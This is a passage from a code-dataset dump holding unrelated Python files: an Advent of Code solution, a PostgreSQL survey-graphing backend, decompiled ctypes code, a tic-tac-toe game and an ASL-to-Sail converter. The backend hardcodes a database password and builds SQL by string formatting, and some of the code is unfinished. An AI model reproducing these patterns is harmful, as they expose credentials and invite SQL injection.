defaultdict\nimport re\n\n\ndef result(data, part):\n grid = map(lambda s: map(int, re.findall(r'-?\\d+', s)), data)\n matrix = defaultdict(list)\n overlaps = {}\n for (id, x, y, width, height) in grid:\n overlaps[id] = set()\n for i in range(x, x + width):\n for j in range(y, y + height):\n if matrix[(i, j)]:\n for number in matrix[(i, j)]:\n overlaps[id].add(number)\n overlaps[number].add(id)\n matrix[(i, j)].append(id)\n if part == 1:\n return len([k for k in matrix if len(matrix[k]) > 1])\n return [k for k in overlaps if len(overlaps[k]) == 0][0]\n\n\ndef createGrid(matrix, grid):\n return matrix\n\n\ndef partone(data, length):\n matrix = [[0 for i in range(length)] for j in range(length)]\n res = 0\n for row in data:\n grid = Grid(row)\n top, left = grid.get_start_position()\n bottom, right = grid.get_size()\n for i in range(bottom):\n for j in range(right):\n try:\n matrix[top + i][left + j] = matrix[top + i][left + j] + 1\n except IndexError:\n print(str(grid) + \" failed\")\n raise\n for i in range(length):\n for j in range(length):\n if matrix[i][j] > 1:\n res = res + 1\n return res\n\n\ndef parttwo(data, length):\n matrix = [[0 for i in range(length)] for j in range(length)]\n partres = set()\n for row in data:\n grid = Grid(row)\n skip = False\n top, left = grid.get_start_position()\n bottom, right = grid.get_size()\n for i in range(bottom):\n for j in range(right):\n res = matrix[top + i][left + j] + 1\n matrix[top + i][left + j] = res\n if res > 1:\n skip = True\n if skip:\n continue\n partres.add(grid.get_id())\n grids = []\n for row in data:\n grids.append(Grid(row))\n for i in partres:\n grids[i]\n pass\n\n\ndef read_file(file_path):\n \"\"\"\n Read from a file called systemparamter.csv\n The file has to be defined as:\n x;y;z\n x1;y1;z1\n\n Note:\n semicolon (;) seperation\n newline (\\n) defines new entry\n \"\"\"\n with open(file_path, 'r', newline='') as file:\n return [x.strip() for x in list(file.readlines())]\n\n\nif __name__ == '__main__':\n values = read_file('input.csv')\n print(result(values, 1))\n print(result(values, 2))\n print(partone(values, 1000))\n print(parttwo(values))\n","sub_path":"AdventOfCode18/Day3/DayThree.py","file_name":"DayThree.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156476796","text":"import psycopg2\nimport numpy as np\nimport seaborn as sns; sns.set()\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef main():\n \"\"\"Runs some sample queries on the database. Switch out the passed query in\n the runQuery() call to view other query results. Note that some \n combinations of data types are not yet implemented (see createGraph()\n for details).\"\"\"\n # Sample queries\n querySingleCategorical = [\"ETHNIC\", \"\", \"\", \"\"]\n querySingleContinuous = [\"AGE\", \"\", \"\", \"\"]\n queryDoubleCategorical = [\"DRINK\", \"RACE\", \"\", \"\"]\n queryCategoricalvContinuous = [\"AGE\", \"EDUC\", \"\", \"\"]\n # Running the queries\n ds = DataSource()\n ds.runQuery(queryDoubleCategorical)\n print(ds.getStats())\n ds.createGraph()\n\nclass DataSource:\n \"\"\"Implements the backend of Will Schwarzer's and Nathan Mannes's web\n project. Used as follows: first call runQuery(query), then either\n getStats() or createGraph().\"\"\"\n \n def __init__(self):\n # Create database connection\n self.connection = psycopg2.connect(\"dbname=mannesn user=mannesn\" +\n \" password=snail647spring host=localhost\")\n self.initializeCursor()\n # Future pandas objects\n theDataFrame = None\n theSeries = None\n # Future data arrays\n dataArray = []\n percentageArray = []\n # Query info\n primary = secondary = control1 = control2 = \"\"\n # These have self explicit because for some reason Python was\n # interpreting dataTypeSecondary as a class variable\n self.dataTypePrimary = self.dataTypeSecondary = \"\"\n # Dictionary of descriptions, used to create better graph labels\n self.descriptionDict = np.load(\"descriptionDict.npy\").item()\n\n def runQuery(self, query):\n \"\"\"Runs the given query on the database and stores the results as\n instance variables.\"\"\"\n self.parseQueryVariables(query)\n self.dataArray = self.getDataArray()\n self.percentageArray = self.getPercentageArray(self.dataArray)\n \n def getStats(self):\n \"\"\"Currently just returns number of respondents to a given query.\"\"\"\n # All counts in the data array are in the second row and beyond,\n # possibly including some row headers\n count = 0\n for row in self.dataArray[1:]:\n for i in range(len(row)):\n try:\n count += int(row[i])\n except:\n # Was a row header, continue to rest of row\n continue\n return count\n \n def createGraph(self):\n \"\"\"Saves the appropriate type of graph for the query as output.png.\"\"\"\n type1 = self.dataTypePrimary\n type2 = self.dataTypeSecondary\n if type2 == \"\":\n self.getBarPlot(self.dataArray)\n else:\n self.getHeatMap(self.dataArray)\n \n def parseQueryVariables(self, query):\n \"\"\"Saves the desired variables for this query\"\"\"\n self.primary = query[0]\n self.secondary = query[1]\n #Controls are not yet implemented\n self.control1 = \"\"\n self.control2 = \"\"\n \n ### DATABASE MANAGEMENT ###\n \n def getDataArray(self):\n dict = self.getDictionary()\n if self.secondary != \"\":\n return self.dictionaryToArrayTwoVariables(dict)\n else:\n return self.dictionaryToArrayOneVariable(dict) \n \n def getPercentageArray(self, dataArray):\n percentageArray = [dataArray[0]]\n columnSums = []\n for i in range(1, len(dataArray[0])):\n columnSum = 0\n for row in dataArray[1:]:\n columnSum += row[i]\n columnSums.append(columnSum)\n for i in range(1, len(dataArray)):\n newRow = [dataArray[i][0]]\n for j in range(1, len(dataArray[0])):\n newRow.append(dataArray[i][j]/columnSums[j-1])\n percentageArray.append(newRow)\n return percentageArray\n \n \n def dictionaryToArrayOneVariable(self, dict):\n \"\"\"Takes the dictonary of combinations of responses and the \n number of times those combos occur, and generates a list in a format\n that can be graphed later\"\"\"\n self.dataTypePrimary = self.getDataType(self.primary, dict)\n orderedRow = self.getOrderedVariables(self.primary, dict)\n values = []\n counts = []\n for response in orderedRow:\n try:\n # If that response appeared, add it\n counts.append(dict[(response,)])\n values.append(response.title())\n except KeyError:\n # That response didn't actually appear; ignore it\n continue\n returnArray = [values, counts]\n self.dataArray = returnArray\n return returnArray \n \n def dictionaryToArrayTwoVariables(self, dict):\n \"\"\"Takes the dictonary of combinations of responses and the \n number of times those combos occur, and generates a list in a format\n that can be graphed later\"\"\"\n self.dataTypePrimary = self.getDataType(self.primary, dict)\n self.dataTypeSecondary = self.getDataType(self.secondary, dict)\n orderedRow = self.getOrderedVariables(self.primary, dict)\n orderedColumn = self.getOrderedVariables(self.secondary, dict)\n # Lowercase values look better in the graph; also applies to line 145\n orderedColumnLowerCase = [value.title() for value in orderedColumn]\n array = []\n array.append([\"\"] + orderedColumnLowerCase)\n for rowvar in orderedRow:\n nextRow = []\n nextRow.append(rowvar.title())\n for column in orderedColumn:\n nextRow.append(self.fetchCountTwoVariables(dict, rowvar, column))\n array.append(nextRow)\n self.dataArray = array\n return array\n \n def getDictionary(self):\n \"\"\"Selects one of two functions to create a dictionary \n of the query results\"\"\"\n if self.secondary == \"\":\n return self.getDictionaryOneVariable()\n else:\n return self.getDictionaryTwoVariables()\n \n def getDictionaryOneVariable(self):\n \"\"\"Returns a dictionary where each key corresponds to survey \n results, and each value is the number of times that response\n was in the queried set\"\"\"\n responses = self.query()\n dict = {}\n for response in responses:\n #response = response[0]\n dict.setdefault(response, \"dummy value\")\n if dict[response] == \"dummy value\":\n dict[response] = 1\n else:\n dict[response] = dict[response] + 1\n return dict\n \n def getDictionaryTwoVariables(self):\n \"\"\"Returns a dictionary where each key corresponds to survey results, \n and each value is the number of times that combination of responses\n was in the queried set\"\"\"\n responses = self.query()\n dict = {}\n for response in responses:\n dict.setdefault(response, \"dummy value\")\n if dict[response] == \"dummy value\":\n dict[response] = 1\n else:\n dict[response] = dict[response] + 1\n return dict\n \n def initializeCursor(self):\n \"\"\"Opens a connection to the database\"\"\"\n self.cursor = self.connection.cursor()\n \n def query(self):\n \"\"\"Returns a list of tuples containing the query results\"\"\"\n self.executeQuery()\n self.cursor.fetchone()\n return self.cursor.fetchall()\n \n def executeQuery(self):\n \"\"\"executes a query using the instance variables for primary, secondary\"\"\"\n if self.control2 != \"\":\n self.queryTwoVariablesTwoControls()\n elif self.control1 != \"\":\n self.queryTwoVariablesOneControl()\n elif self.secondary != \"\":\n self.queryTwoVariables()\n else:\n self.queryOneVariable()\n \n def getOrderedVariables(self, varName, responses):\n \"\"\"Takes a variable as input and the dictionary of results in order\n to return a list of the responses in the order they should be displ-\n ayed\"\"\"\n varNP = np.load(\"orders.npy\")\n variableOrdersDict = varNP.item()\n varList = variableOrdersDict[varName]\n vars = []\n if varName == self.primary:\n dataType = self.dataTypePrimary\n else:\n dataType = self.dataTypeSecondary\n if dataType == 'categorical':\n for x in varList:\n temp = x[1]\n temp = temp.replace('\"', '')\n vars.append(temp)\n return self.removeExtraVariables(vars, responses)\n else:\n return self.getVarKeys(varName, responses)\n \n def getVarKeys(self, varName, dict):\n \"\"\"For a continuous variable , return a list of all of the \n responses that correspond to that variable form the results\"\"\"\n orderedValues, continuousValues, categoricalValues = [], [], []\n keys = dict.keys()\n if varName == self.primary:\n values = [key[0] for key in keys]\n else:\n values = [key[1] for key in keys]\n for value in values:\n try:\n x=int(value)\n continuousValues.append(value)\n except:\n categoricalValues.append(value)\n continuousValues.sort(key = lambda x: int(x))\n for value in continuousValues:\n if value not in orderedValues:\n orderedValues.append(value)\n for value in categoricalValues:\n if value not in orderedValues:\n orderedValues.append(value)\n return orderedValues\n \n def getDataType(self, varName, dict):\n \"\"\"Tests whether or not a variable is continuous(AGE) or \n categorical (SEX). This is important when we choose different\n graph types based on this distinction\"\"\"\n vars = []\n keys = sorted(dict.keys())\n if varName == self.primary:\n for k in keys:\n vars.append(k[0])\n elif varName == self.secondary:\n for k in keys:\n vars.append(k[1])\n elif varName == self.control1:\n for k in keys:\n vars.append(k[2])\n else:\n for k in keys:\n vars.append(k[3])\n for key in vars:\n if not key[0].isdigit():\n return \"categorical\"\n return \"continuous\"\n \n def fetchCountOneVariable(self, dict, row):\n \"\"\" Gets the count of the number of times a single variable shows\n up in the results\"\"\"\n listOfKeys = dict.keys()\n x = 0\n for key in listOfKeys:\n if row in key:\n x += dict[key]\n return x\n \n def fetchCountTwoVariables(self, dict, row, column):\n \"\"\"Gets the count of the number of times a combination of two\n responses occurs in our query\"\"\"\n listOfKeys = dict.keys()\n x = 0\n for key in listOfKeys:\n if row in key and column in key:\n x += dict[key]\n return x\n \n def isInKeys(self, dict, s):\n \"\"\"Tests if s occurs as a key in our dataset\"\"\"\n keys = dict.keys()\n for key in keys:\n if s in key:\n return True\n return False\n \n def removeExtraVariables(self, l, dict):\n \"\"\"Some variable queries have variables we don't want to crosstab\n We remove names from badnames from the list of variables we want to \n graph\"\"\"\n newList = []\n badNames = [\"IAP\", \"UNCODEABLE & IAP\", \"UNCODEABLE\"]\n for x in l:\n if self.isInKeys(dict, x) and x not in badNames:\n newList.append(x)\n return newList\n \n def queryOneVariable(self):\n \"\"\"Executes a query with the primary variable\"\"\"\n query = \"SELECT %s FROM gssdata WHERE %s IS NOT NULL;\" \n query = query % (self.primary, self.primary)\n self.cursor.execute(query)\n \n def queryTwoVariables(self):\n \"\"\"Executes a query with the primary and secondary variable\"\"\"\n query = \"SELECT %s, %s FROM gssdata WHERE %s IS NOT NULL AND %s IS NOT NULL\"\n query = query % (self.primary, self.secondary, self.primary, self.secondary)\n self.cursor.execute(query)\n \n def queryTwoVariablesOneControl(self):\n \"\"\"Executes a query with the primary variable, secondary variable, and \n one control variable\"\"\"\n query = \"SELECT %s, %s, %s FROM gssdata WHERE %s\"\n query +=\" IS NOT NULL AND %s IS NOT NULL AND %s IS NOT NULL;\"\n query = query % (self.primary, self.secondary, self.control1,\n self.primary, self.secondary, self.control1)\n self.cursor.execute(query)\n \n def queryTwoVariablesTwoControls(self):\n query = \"SELECT %s, %s, %s, %s FROM gssdata WHERE %s\"\n query +=\" IS NOT NULL AND %s IS NOT NULL AND %s IS NOT NULL AND\" \n query +=\" %s IS NOT NULL;\"\n query = query % (self.primary, self.secondary, self.control1, self.control2,\n self.primary, self.secondary, self.control1, self.control2)\n self.cursor.execute(query)\n \n ### GRAPHING ###\n \n def getHeatMap(self, theDataFrame):\n \"\"\"Creates a heatmap for two categorical variable queries.\"\"\"\n f, ax = plt.subplots(figsize=(12, 6))\n self.theDataFrame = self.categoricalArrayToDataFrame(self.percentageArray)\n xDescription = self.descriptionDict[self.secondary]\n yDescription = self.descriptionDict[self.primary]\n if self.dataTypePrimary == self.dataTypeSecondary == \"categorical\":\n plot = sns.heatmap(self.theDataFrame, annot=True, fmt=\".01%\", \n linewidths=0.5, ax=ax, cmap=\"Blues\")\n else:\n plot = sns.heatmap(self.theDataFrame, annot=False, \n linewidths=0.5, ax=ax, cmap=\"Blues\")\n ax.set(xlabel=xDescription, ylabel=yDescription)\n picture = plot.get_figure()\n picture.savefig(\"static/\" + self.primary + \"-\" + \n self.secondary + \".png\", bbox_inches = \"tight\")\n return\n\n def getBarPlot(self, array):\n \"\"\"Creates a bar plot for single categorical variable queries.\"\"\"\n # NOTE: sns.barplot() does not yet seem to play well with pandas series\n # For that reason, this is temporarily using default arrays\n f, ax = plt.subplots(figsize=(12, 6))\n ax = sns.barplot(array[0], array[1])\n description = self.descriptionDict[self.primary]\n ax.set(xlabel=description, ylabel = \"count\")\n # Rotate labels\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n # Add margin to bottom\n f.subplots_adjust(bottom=0.2)\n picture = ax.get_figure()\n picture.savefig(\"static/\" + self.primary + \".png\", bbox_inches = \"tight\") \n\n\n def continuousArrayToSeries(self, array):\n \"\"\"Converts a 2-element list of lists (i.e. for a single variable\n query) to a 1D pandas Series, where the data is continuous.\"\"\"\n name = self.primary\n values = []\n # For each possible value (i.e. element of first array), add the\n # corresponding number of that value (i.e. element of second array)\n # to the overall series (ignores categorical responses to query)\n for i in range(len(array[0])):\n try:\n for j in range(int(array[1][i])):\n values.append(int(array[0][i]))\n except:\n # array[0][i] was not an int; skip this value\n continue\n theSeries = pd.Series(data = values, index = values, name = name)\n return theSeries\n \n def categoricalArrayToDataFrame(self, array):\n \"\"\"Converts a 2D array (list of lists) of categorical objects\n to a 2D pandas DataFrame.\"\"\"\n # By convention in the rest of the code, the first row is the primary\n # labels, the first column is the secondary labels, and the rest is the\n # count of responses with each pair of values\n data = [row[1:] for row in array[1:]]\n rowHeaders = [row[0] for row in array[1:]]\n columnHeaders = array[0][1:]\n name = self.primary\n theDataFrame = pd.DataFrame(data = data,\n index = rowHeaders,\n columns = columnHeaders,)\n return theDataFrame\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"datasource.py","file_name":"datasource.py","file_ext":"py","file_size_in_byte":16829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578622574","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.0 (v3.6.0:41df79263a11, Dec 23 2016, 08:06:12) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: ctypes\\macholib\\framework.py\n\"\"\"\nGeneric framework path manipulation\n\"\"\"\nimport re\n__all__ = [\n 'framework_info']\nSTRICT_FRAMEWORK_RE = re.compile('(?x)\\n(?P<location>^.*)(?:^|/)\\n(?P<name>\\n (?P<shortname>\\\\w+).framework/\\n (?:Versions/(?P<version>[^/]+)/)?\\n (?P=shortname)\\n (?:_(?P<suffix>[^_]+))?\\n)$\\n')\n\ndef framework_info(filename):\n \"\"\"\n A framework name can take one of the following four forms:\n Location/Name.framework/Versions/SomeVersion/Name_Suffix\n Location/Name.framework/Versions/SomeVersion/Name\n Location/Name.framework/Name_Suffix\n Location/Name.framework/Name\n\n returns None if not found, or a mapping equivalent to:\n dict(\n location='Location',\n name='Name.framework/Versions/SomeVersion/Name_Suffix',\n shortname='Name',\n version='SomeVersion',\n suffix='Suffix',\n )\n\n Note that SomeVersion and Suffix are optional and may be None\n if not present\n \"\"\"\n is_framework = STRICT_FRAMEWORK_RE.match(filename)\n if not is_framework:\n return\n else:\n return is_framework.groupdict()\n\n\ndef test_framework_info():\n\n def d(location=None, name=None, shortname=None, version=None, suffix=None):\n return dict(location=location,\n name=name,\n shortname=shortname,\n version=version,\n suffix=suffix)\n\n if not framework_info('completely/invalid') is None:\n raise AssertionError\n else:\n if not framework_info('completely/invalid/_debug') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework/_debug') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework/F') == d('P', 'F.framework/F', 'F'):\n raise AssertionError\n elif not framework_info('P/F.framework/F_debug') == d('P', 'F.framework/F_debug', 'F', suffix='debug'):\n raise AssertionError\n assert framework_info('P/F.framework/Versions') is None\n assert framework_info('P/F.framework/Versions/A') is None\n assert framework_info('P/F.framework/Versions/A/F') == d('P', 'F.framework/Versions/A/F', 'F', 'A')\n assert framework_info('P/F.framework/Versions/A/F_debug') == d('P', 'F.framework/Versions/A/F_debug', 'F', 'A', 'debug')\n\n\nif __name__ == '__main__':\n test_framework_info()","sub_path":"PYZ-00.pyz/ctypes/macholib/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427413746","text":"def DisplayBoard(l):\n print(' | | ')\n print(' {} | {} | {} '.format(l[0],l[1],l[2]))\n print('---------------------')\n print(' | | ')\n print(' {} | {} | {} '.format(l[3],l[4],l[5]))\n print('---------------------')\n print(' | | ')\n print(' {} | {} | {} '.format(l[6],l[7],l[8]))\n\ndef PlayerInput(player1):\n player1 = input(\"Please pick a marker 'X' or 'O'\")\n while player1 not in 'XO':\n print('Invalid input')\n player1 = input(\"Please pick a marker 'X' or 'O'\")\n return player1\n\ndef Place_Marker(pl,c,pos):\n pl[pos] = c\n\n\ndef win_check(pl,c):\n if(pl[0] == c and pl[1] == c and pl[2] == c):\n return True\n elif (pl[3] == c and pl[4] == c and pl[5] == c):\n return True\n elif (pl[6] == c and pl[7] == c and pl[8] == c):\n return True\n elif (pl[0] == c and pl[4] == c and pl[8] == c):\n return True\n elif (pl[2] == c and pl[4] == c and pl[6] == c):\n return True\n elif (pl[0] == c and pl[3] == c and pl[6] == c):\n return True\n elif (pl[1] == c and pl[4] == c and pl[7] == c):\n return True\n elif (pl[2] == c and pl[5] == c and pl[8] == c):\n return True\n else:\n return False\n\n\n\ndef space_check(board, position):\n if board[position] == '#':\n game_on = False\n return True\n else:\n return False\n\ndef full_board_check(board):\n if '#' in board:\n return False\n else:\n return True\n\ndef player_choice(board):\n pos = int(input('enter the next position'))\n while pos == '#':\n pos = int(input('enter valid next position'))\n return pos\n\ndef replay():\n inp = input('do you want to play or not yes/no')\n return inp\n\n\n\nprint(\"welcome to tictactoe\")\n\n\nwhile True:\n l = ['#', '#', '#', '#', '#', '#', '#', '#', '#']\n player1 = PlayerInput('')\n player2 = ''\n if player1 == 'X':\n player2 = 'O'\n else:\n player2 = 'X'\n game_on = True\n winner = 'notyet'\n while game_on :\n print('this is player1 turn')\n pos = player_choice(l)\n while not space_check(l,pos):\n print('already filled')\n pos = player_choice(l)\n Place_Marker(l, 'X', pos)\n DisplayBoard(l)\n\n if win_check(l,'X'):\n print('player1 has won')\n gameOver = True\n break\n if full_board_check(l) and winner == 'notyet':\n print('match Drawn')\n\n\n print('this is player2 turn')\n pos = player_choice(l)\n while not space_check(l, pos):\n print('already filled')\n pos = player_choice(l)\n Place_Marker(l, 'O', pos)\n DisplayBoard(l)\n\n if win_check(l, 'O'):\n print('player2 has won')\n gameOver = True\n break\n if full_board_check(l) and winner == 'notyet':\n print('match Drawn')\n\n\n\n playAgain = replay()\n if playAgain == 'yes':\n continue\n else :\n break\n\n\n\n \n","sub_path":"Tictactoe.py","file_name":"Tictactoe.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430770244","text":"import copy\nimport itertools\nimport math\nimport re\nimport string\nimport xml.etree.cElementTree as ET\nimport pyleri\nfrom pyleri import Grammar, Regex, Choice, Sequence, Token, Keyword, Repeat, Ref\nfrom pyleri.node import Node\n\nimport explanations\nfrom explanations import sanitize, asl_bitexpr_to_sail, bitlit_re, Explanation\n\ndef expand_dontcares(s):\n if len(s) == 0:\n return []\n elif len(s) == 1:\n if s in 'xX':\n return ['0', '1']\n elif s in '10':\n return s\n else:\n assert False, 'expand_dontcares() saw non-1|0|x'\n elif s[0] in 'xX':\n rest = expand_dontcares(s[1:])\n return (['0' + r for r in rest] +\n ['1' + r for r in rest])\n elif s[0] in '10':\n return [s[0] + r for r in expand_dontcares(s[1:])]\n else:\n assert False, 'expand_dontcares() saw non-1|0|x'\n\ndef name_or_const(guards, hi, lo, nm, split, consts, actual_consts):\n if nm in guards and 'x' not in guards[nm]:\n return '0b{}'.format(guards[nm], nm)\n elif actual_consts != 'x' * (hi - lo + 1) and '!=' not in actual_consts:\n return '0b{}'.format(actual_consts.replace('(', '').replace(')', ''), nm) # unpred\n else:\n return nm\n\nguard_re = re.compile(r'([A-Za-z0-9]+) == \\(?([01x]+)\\)?')\nneg_guard_re = re.compile(r'([A-Za-z0-9]+) != \\(?([01x]+)\\)?')\n\n\ndef parse_guards(s):\n if s is None:\n return ({}, {})\n pos = {}\n neg = {}\n guards = s.split(' && ')\n for g in guards:\n m = guard_re.match(g)\n if m:\n pos[m.group(1)] = m.group(2)\n else:\n m = neg_guard_re.match(g)\n if m:\n neg[m.group(1)] = m.group(2)\n else:\n assert False\n return (pos, neg)\n\ndef emit_sail_asm(file, enc):\n enc_name, enc_iset, enc_fields, enc_asl, enc_asms = enc\n for (gs, rhs) in enc_asms:\n pos_guards, neg_guards = parse_guards(gs)\n fields = [name_or_const(pos_guards, *f) for f in enc_fields if f[2] != '_']\n lhs = '{}({})'.format(sanitize(enc_name), ', '.join(fields))\n\n pos_guards = {k: expand_dontcares(v) for k, v in pos_guards.items()}\n neg_guards = {k: expand_dontcares(v) for k, v in neg_guards.items()}\n pos_sail_guards = ' & '.join(['(' + ' | '.join('{} == 0b{}'.format(k, v) for v in vs) + ')' for k, vs in pos_guards.items()])\n neg_sail_guards = ' & '.join(['(' + ' & '.join('{} != 0b{}'.format(k, v) for v in vs) + ')' for k, vs in neg_guards.items()])\n\n clause = 'mapping clause assembly = {}{}{} <-> {}'.format(lhs,\n ' if ' if neg_sail_guards else '',\n neg_sail_guards,\n rhs.replace(':', '@'))\n print(clause, file=file)\n\nclass ASMTemplateGrammar(Grammar):\n doublespace = Regex('\\s\\s+')\n space = Regex('\\s')\n link = Regex('<[A-Za-z0-9_|()+]+>')\n text = Regex('[A-Za-z0-9_[\\]!,#.]+')\n optional = Ref()\n optional = Sequence('{', Repeat(Choice(link, text, optional, space), mi=1), '}')\n bracket_alternative = Sequence('(', Repeat(Choice(link, text, space), mi=1), '|', Repeat(Choice(link, text, space), mi=1), ')')\n# unbracket_alternative = Sequence(Choice(link, text), mi=1), '|', Repeat(Choice(link, text), mi=1))\n optional_alternative = Sequence('{', Repeat(Choice(link, text, space), mi=1), '|', Repeat(Choice(link, text, space), mi=1), '}')\n START = Repeat(Choice(doublespace, space, link, text, optional_alternative, bracket_alternative, optional), mi=1)\n\n def _walk(self, element, pos, tree, rule, is_required):\n if self._pos != pos:\n self._s = self._string[pos:] #.lstrip() # don't strip whitespace\n self._pos = self._len_string - len(self._s)\n node = Node(element, self._string, self._pos)\n self._expecting.set_mode_required(node.start, is_required)\n return element._get_node_result(self, tree, rule, self._s, node)\n\nasm_grammar = ASMTemplateGrammar()\n\nclass BitConcatsGrammar(Grammar):\n START = Ref()\n arg = Regex('[A-Za-z][A-Za-z0-9]*')\n brackets = Sequence('(', START, ')')\n literal = Regex('0b[01]+')\n concat = pyleri.List(Choice(brackets, arg, literal), delimiter='@')\n START = Choice(brackets, arg, literal, concat)\n\nbit_concats_grammar = BitConcatsGrammar()\n\ndef fst_by_snd(pairs, target):\n for fst, snd in pairs:\n if target == snd:\n return fst\n raise KeyError(target)\n\ndef process_bitconcat_node_get_bits(types, node):\n assert hasattr(node.element, 'name')\n if node.element.name == 'START':\n return process_bitconcat_node_get_bits(types, node.children[0])\n elif node.element.name == 'literal':\n return len(node.string) - 2 # remove the '0b'\n elif node.element.name == 'brackets':\n return process_bitconcat_node_get_bits(types, node.children[1])\n elif node.element.name == 'arg':\n return bits_type_to_n(types[node.string])\n elif node.element.name == 'concat':\n return sum(process_bitconcat_node_get_bits(types, n.children[0]) for n in node.children if str(n.element) != '@')\n else:\n assert False, 'unknown element type in process_bitconcat_node_get_bits'\n\ndef get_bitconcat_n_bits(types, bc):\n parse = bit_concats_grammar.parse(bc)\n assert parse.is_valid\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n return process_bitconcat_node_get_bits(types, start)\n\ndef process_bitconcat_node_typing(types, node):\n assert hasattr(node.element, 'name')\n if node.element.name == 'START':\n return process_bitconcat_node_typing(types, node.children[0])\n elif node.element.name == 'literal':\n return '{}'.format(node.string, len(node.string) - 2) # (remove 0b) Type annotating this shouldn't be necessary but sail bug\n elif node.element.name == 'brackets':\n return '({})'.format(process_bitconcat_node_typing(types, node.children[1]))\n elif node.element.name == 'arg':\n return '({}:{})'.format(node.string, types[node.string])\n elif node.element.name == 'concat':\n return '@'.join(process_bitconcat_node_typing(types, n.children[0]) for n in node.children if str(n.element) != '@')\n else:\n assert False, 'unknown element type in process_bitconcat_node_typing'\n\ndef type_bitconcat(types, bc):\n parse = bit_concats_grammar.parse(bc)\n assert parse.is_valid\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n return process_bitconcat_node_typing(types, start)\n\nclass NoDefaultException(Exception): pass\n\ndef default_clause(explanations, types, arg, link):\n exp = explanations[link]\n try:\n default = exp.props['default']\n except KeyError as e:\n if link.startswith('<extend>') and link.endswith('_32_addsub_ext') or link.endswith('_32S_addsub_ext'):\n default = 'UXTW'\n elif link.startswith('<extend>') and link.endswith('_64_addsub_ext') or link.endswith('_64S_addsub_ext'):\n default = 'UXTX'\n elif exp.type == 'asm_constant' and 'expr' in exp.props and exp.props['expr'] == 'PRESENCE':\n default = '0'\n else:\n raise NoDefaultException() from e\n m = bitlit_re.match(default)\n if m:\n return asl_bitexpr_to_sail(default)\n elif ' ' in default:\n assert exp.type == 'TABLE'\n return '{}'.format(asl_bitexpr_to_sail(fst_by_snd(exp.values, default)))\n elif default.isdigit():\n return '0b{:0{}b}'.format(int(default), get_bitconcat_n_bits(types, arg))\n elif default.isalnum():\n assert exp.type == 'TABLE'\n return '{}'.format(asl_bitexpr_to_sail(fst_by_snd(exp.values, '\"' + default + '\"')))\n else:\n assert False, \"default_clause doesn't know how to handle {!r} for {!r}\".format(default, link)\n\ndef generate_presence_explanation(instr_name, enc_name, explanations, types, el):\n link = el.string + '_' + enc_name\n el_exp = explanations[link]\n\n values = [\n ('0b0', '\"\" if false /* hack */'),\n ('0b1', '\"{}\"'.format(el_exp.props['constant'])),\n ('0b0', '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(el_exp.props['encoded_in'])),\n 'arg_type': 'bits({})'.format(get_bitconcat_n_bits(types, el_exp.props['encoded_in'])),\n }\n name = '{}_presence_{}'.format(enc_name, sanitize(el_exp.props['encoded_in']))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, [el_exp.props['encoded_in']], [link])\n\ndef generate_optional_explanation(instr_name, enc_name, explanations, types, children):\n els_args = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children[1].children]\n elements = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args])) # flatten\n args = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args])) # flatten\n links = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args])) # flatten\n\n values = [\n ('({})'.format(', '.join(default_clause(explanations, types, arg, link) for arg, link in zip(args, links))), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args)), ' ^ '.join(elements)),\n ('({})'.format(', '.join(default_clause(explanations, types, arg, link) for arg, link in zip(args, links))), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args)) if len(args) > 0 else 'unit',\n }\n name = '{}_optional_{}'.format(enc_name, sanitize('_'.join(args)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args, links)\n\ndef generate_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2):\n els_args1 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children1]\n elements1 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args1])) # flatten\n args1 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args1])) # flatten\n links1 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args1])) # flatten\n\n els_args2 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children2]\n elements2 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args2])) # flatten\n args2 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args2])) # flatten\n links2 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args2])) # flatten\n\n if args1[0].split('@') == args2:\n args1 = args2\n elif args1 == args2[0].split('@'):\n args2 = args1\n\n assert args1 == args2\n # what to do about links? they're almost certainly different\n\n values = [\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args1)), ' ^ '.join(elements1)),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args2)), ' ^ '.join(elements2)),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args1)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in 